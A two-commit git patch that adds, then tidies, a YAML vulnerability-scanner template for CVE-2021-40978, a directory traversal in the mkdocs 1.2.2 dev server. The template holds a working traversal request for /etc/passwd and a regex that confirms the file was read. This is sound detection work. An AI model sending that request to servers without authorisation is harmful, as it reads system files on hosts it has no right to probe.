From b22eb1ba01cd9d673fe57cc9a2e8d01bbc291929 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 14 Oct 2021 08:37:46 +0700 Subject: [PATCH 1/2] Create CVE-2021-40978.yaml --- cves/2021/CVE-2021-40978.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2021/CVE-2021-40978.yaml diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml new file mode 100644 index 0000000000..0c071a0eb1 --- /dev/null +++ b/cves/2021/CVE-2021-40978.yaml @@ -0,0 +1,26 @@ +id: CVE-2021-40978 + +info: + name: mkdocs 1.2.2 built-in dev-server allows directory traversal + author: pikpikcu + severity: high + reference: https://github.com/nisdn/CVE-2021-40978 + tags: cve,cve2021,mkdocs,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0:" + part: body + condition: and + + - type: status + status: + - 200 From 1e4fae76a3790e65c4a42cf49fb34d128d98d565 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 14 Oct 2021 09:23:48 +0530 Subject: [PATCH 2/2] Update CVE-2021-40978.yaml --- cves/2021/CVE-2021-40978.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml index 0c071a0eb1..47dae4ec2f 100644 --- a/cves/2021/CVE-2021-40978.yaml +++ b/cves/2021/CVE-2021-40978.yaml @@ -1,10 +1,12 @@ id: CVE-2021-40978 info: - name: mkdocs 1.2.2 built-in dev-server allows directory traversal + name: mkdocs 1.2.2 built-in dev-server allows directory traversal author: pikpikcu severity: high - reference: https://github.com/nisdn/CVE-2021-40978 + reference: + - https://github.com/nisdn/CVE-2021-40978 + - https://nvd.nist.gov/vuln/detail/CVE-2021-40978 tags: cve,cve2021,mkdocs,lfi requests: @@ -19,7 +21,6 @@ requests: regex: - "root:[x*]:0:0:" part: body - condition: and - type: status status: